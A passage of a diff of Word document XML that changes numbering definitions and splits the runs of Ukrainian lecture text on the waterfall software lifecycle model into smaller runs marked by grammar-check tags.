+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="04190005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="04190001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04190003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="04190005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="11">
     <w:nsid w:val="64277235"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="67102D8E"/>
@@ -30712,7 +29382,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="11">
+  <w:abstractNum w:abstractNumId="12">
     <w:nsid w:val="6E2B310E"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="A888DA66"/>
@@ -30825,7 +29495,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="12">
+  <w:abstractNum w:abstractNumId="13">
     <w:nsid w:val="7DDD64F0"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="04190021"/>
@@ -30942,7 +29612,7 @@
     <w:abstractNumId w:val="4"/>
   </w:num>
   <w:num w:numId="2">
-    <w:abstractNumId w:val="12"/>
+    <w:abstractNumId w:val="13"/>
   </w:num>
   <w:num w:numId="3">
     <w:abstractNumId w:val="9"/>
@@ -30951,7 +29621,7 @@
     <w:abstractNumId w:val="2"/>
   </w:num>
   <w:num w:numId="5">
-    <w:abstractNumId w:val="10"/>
+    <w:abstractNumId w:val="11"/>
   </w:num>
   <w:num w:numId="6">
     <w:abstractNumId w:val="7"/>
@@ -30969,13 +29639,16 @@
     <w:abstractNumId w:val="3"/>
   </w:num>
   <w:num w:numId="11">
-    <w:abstractNumId w:val="11"/>
+    <w:abstractNumId w:val="12"/>
   </w:num>
   <w:num w:numId="12">
     <w:abstractNumId w:val="1"/>
   </w:num>
   <w:num w:numId="13">
     <w:abstractNumId w:val="8"/>
+  </w:num>
+  <w:num w:numId="14">
+    <w:abstractNumId w:val="10"/>
   </w:num>
 </w:numbering>
 </file>
@@ -31259,7 +29932,6 @@
     <w:name w:val="Hyperlink"/>
     <w:basedOn w:val="a0"/>
     <w:uiPriority w:val="99"/>
-    <w:semiHidden/>
     <w:unhideWhenUsed/>
     <w:rsid w:val="00A01E89"/>
     <w:rPr>
@@ -31640,7 +30312,6 @@
     <w:name w:val="Hyperlink"/>
     <w:basedOn w:val="a0"/>
     <w:uiPriority w:val="99"/>
-    <w:semiHidden/>
     <w:unhideWhenUsed/>
     <w:rsid w:val="00A01E89"/>
     <w:rPr>
@@ -32032,7 +30703,7 @@
 </file>
 
 <file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{DDB9DE63-2032-4B82-A158-98234D0F2C95}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{A97C7DD8-238A-4488-ABED-42C1316EAAAD}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>

--- a/Bullshit.docx
+++ b/Bullshit.docx
@@ -398,7 +398,97 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>Насправді, більшість дій в ході виконання проектів не відбуваються за лінійним законом. Найчастіше розробникам буває необхідно повернутися до попередньої стадії, щоб виконати завдання, які не були в свій час дозволені відповідним чином. Якщо на стадії розробки виявляється відсутність або неправильне формулювання вимог, розробник не просувається вперед, а повертається назад - до стадії специфікацій вимог. Після завершення і корекції специфікацій вимог повторно вводиться і починає виконуватися стадія розробки. Щоб відобразити повторюваний характер розробки ПО, в графіку рис. 1.1 було додано зворотні стрілки, в результаті чого вийшов графік стандартного життєвого індустріального циклу, показаний на рис. 1.2.</w:t>
+        <w:t>Насправді, більшість дій в ході виконання проекті</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>в</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> не відбуваються за лінійним законом. Найчастіше розробникам буває необхідно повернутися до попередньої стадії, щоб виконати завдання, які не були в </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>св</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ій час дозволені відповідним чином. Якщо </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>на</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> стадії розробки виявляється відсутність або неправильне формулювання вимог, розробник не просувається вперед, а повертається назад - до стадії специфікацій вимог. </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>П</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ісля завершення і корекції специфікацій вимог повторно вводиться і починає виконуватися стадія розробки. Щоб відобразити повторюваний характер розробки ПО, в графіку рис. 1.1 було додано зворотні </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>стр</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>ілки, в результаті чого вийшов графік стандартного життєвого індустріального циклу, показаний на рис. 1.2.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -529,6 +619,7 @@
           <w:lang w:val="uk-UA"/>
         </w:rPr>
       </w:pPr>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -536,7 +627,17 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>Короткий опис фаз каскадної моделі</w:t>
+        <w:t>Короткий</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> опис фаз каскадної моделі</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -554,7 +655,25 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>Наведена нижче характеристика являє собою короткий опис кожної</w:t>
+        <w:t xml:space="preserve">Наведена нижче характеристика являє собою </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>короткий</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> опис кожної</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -595,13 +714,23 @@
           <w:szCs w:val="28"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>дослідження концепції - відбувається дослідження вимог на системному рівні з метою визначення можливості реалізації концепції;</w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>досл</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>ідження концепції - відбувається дослідження вимог на системному рівні з метою визначення можливості реалізації концепції;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -624,7 +753,43 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>Процес системного розподілу - може бути пропущений для систем з розробки виключно ПО. Для систем, в яких необхідна розробка як апаратного, так і програмного забезпечення, необхідні функції застосовуються до ПЗ і обладнання відповідно до загальної архітектур</w:t>
+        <w:t xml:space="preserve">Процес </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>системного</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> розподілу - може бути пропущений для систем з розробки виключно ПО. Для систем, в яких необхідна розробка як апаратного, так і програмного забезпечення, необхідні функції застосовуються до ПЗ і обладнання відповідно до загальної </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>арх</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>ітектур</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -664,8 +829,18 @@
           <w:szCs w:val="28"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>процес визначення вимог - визначаються програмні вимозі для інформаційної предметної області системи, призначення, лінії поведінки, продуктивність і інтерфейси. (В разі необхідності в процес також включено функціональний розподіл системних вимог до апаратному) 'і програмному)' забезпечення.);</w:t>
-      </w:r>
+        <w:t xml:space="preserve">процес визначення вимог - визначаються програмні вимозі для інформаційної предметної області системи, призначення, лінії поведінки, продуктивність і інтерфейси. </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>(В разі необхідності в процес також включено функціональний розподіл системних вимог до апаратному) 'і програмному)' забезпечення.);</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -687,7 +862,25 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>процес розробки проекту - розробляється і формулнруетсі логічно Послідовна технічна характеристика програмної системи, включаючи структури даних, архітектуру ПО, інтерфейсні уявлення і процесуальну (алгоритмічну) деталізацію;</w:t>
+        <w:t xml:space="preserve">процес розробки проекту - розробляється і формулнруетсі логічно </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Посл</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>ідовна технічна характеристика програмної системи, включаючи структури даних, архітектуру ПО, інтерфейсні уявлення і процесуальну (алгоритмічну) деталізацію;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -710,7 +903,25 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>процес реалізації - в результаті його виконання ескізне опис ПО перетворюється в повноцінний програмний продукт. При цьому створюється вихідний код, база даних і документація, які лежать в основі фізичного перетворення проекту. Якщо програмний продукт являє собою придбаний пакет прикладних програм, основними діями по його реалізації будуть установка і тестування пакету програм. Якщо програмний продукт розробляється на замов</w:t>
+        <w:t xml:space="preserve">процес реалізації - в результаті його виконання ескізне опис ПО перетворюється в повноцінний програмний продукт. При цьому створюється вихідний код, база даних і документація, які лежать </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>в</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> основі фізичного перетворення проекту. Якщо програмний продукт являє собою придбаний пакет прикладних програм, основними діями по його реалізації будуть установка і тестування пакету програм. Якщо програмний продукт розробляється на замов</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -749,7 +960,25 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>процес установки-включає установку ПО, його перевірку і офіційну приймання замовником для операційного середовища;</w:t>
+        <w:t xml:space="preserve">процес установки-включає установку ПО, його </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>перев</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>ірку і офіційну приймання замовником для операційного середовища;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -772,7 +1001,25 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>процес експлуатації та підтримки - має на увазі запуск користувачем системи і поточне забезпечення, включаючи надання технічної допомоги, обговорення питань, що виникли з користувачем, реєстрацію запитів</w:t>
+        <w:t xml:space="preserve">процес експлуатації та </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>п</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>ідтримки - має на увазі запуск користувачем системи і поточне забезпечення, включаючи надання технічної допомоги, обговорення питань, що виникли з користувачем, реєстрацію запитів</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -811,7 +1058,43 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>процес супроводу - пов'язаний з дозволом програмних помилок, несправностей. збоїв, модернізацією та внесенням змін, що генеруються процесом підтримки. Складається з ітерацій розробки і передбачає зворотний зв'язок по про доставлених інформації про аномалії;</w:t>
+        <w:t xml:space="preserve">процес супроводу - пов'язаний з дозволом програмних помилок, несправностей. збоїв, модернізацією та внесенням змін, що генеруються процесом </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>п</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>ідтримки. Складається з ітерацій розробки і передбачає зворотний зв'язок по про доставлених і</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>нформац</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>ії про аномалії;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -852,7 +1135,25 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve"> існуючої системи з її активного використання або шляхом припинення </w:t>
+        <w:t xml:space="preserve"> існуючої системи з її </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>активного</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> використання або шляхом припинення </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -909,7 +1210,25 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>інтегральні завдання - включають початок роботи над проектом, моніторинг проекту та його управління, управління якістю, верифікацію і атестацію, управління конфігурацією, розробку документації і професійну підготовку протягом усього життєвого циклу.</w:t>
+        <w:t xml:space="preserve">інтегральні завдання - включають початок роботи над проектом, моніторинг проекту та його управління, управління якістю, верифікацію і атестацію, управління конфігурацією, розробку документації і професійну </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>п</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>ідготовку протягом усього життєвого циклу.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -976,7 +1295,25 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>ель має безліч переваг, якщо її</w:t>
+        <w:t xml:space="preserve">ель має </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>безл</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>іч переваг, якщо її</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1051,7 +1388,25 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>модель добре відома споживачам. які не мають відношення до розробки та експлуатації програм, і кінцевим користувачам (вона часто використовується іншими організаціями для відстеження проектів, не пов'язаних з розробкою ПЗ);</w:t>
+        <w:t xml:space="preserve">модель добре відома споживачам. які не мають відношення до розробки та експлуатації програм, і кінцевим користувачам (вона часто використовується іншими організаціями </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>для</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> відстеження проектів, не пов'язаних з розробкою ПЗ);</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1099,7 +1454,25 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve"> зі складнощами і добре спрацьовує для тих проектів, які досить зрозумілі, але все ж важк</w:t>
+        <w:t xml:space="preserve"> зі складнощами і добре спрацьовує </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>для</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> тих проектів, які досить зрозумілі, але все ж важк</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1173,7 +1546,25 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>вона досить доступна дли розумінні, так як переслідується проста мета - виконати. необхідні дії;</w:t>
+        <w:t>вона досить доступна дли розумінні, так як переслі</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>дується</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> проста мета - виконати. необхідні дії;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1219,7 +1610,25 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>її структурою може керуватися навіть слабо підготовлений в технічному плані або недосвідчений персонал;</w:t>
+        <w:t xml:space="preserve">її структурою може керуватися навіть слабо </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>п</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>ідготовлений в технічному плані або недосвідчений персонал;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1242,7 +1651,25 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>вона відрізняється стабільністю требоваінй;</w:t>
+        <w:t>вона ві</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>др</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
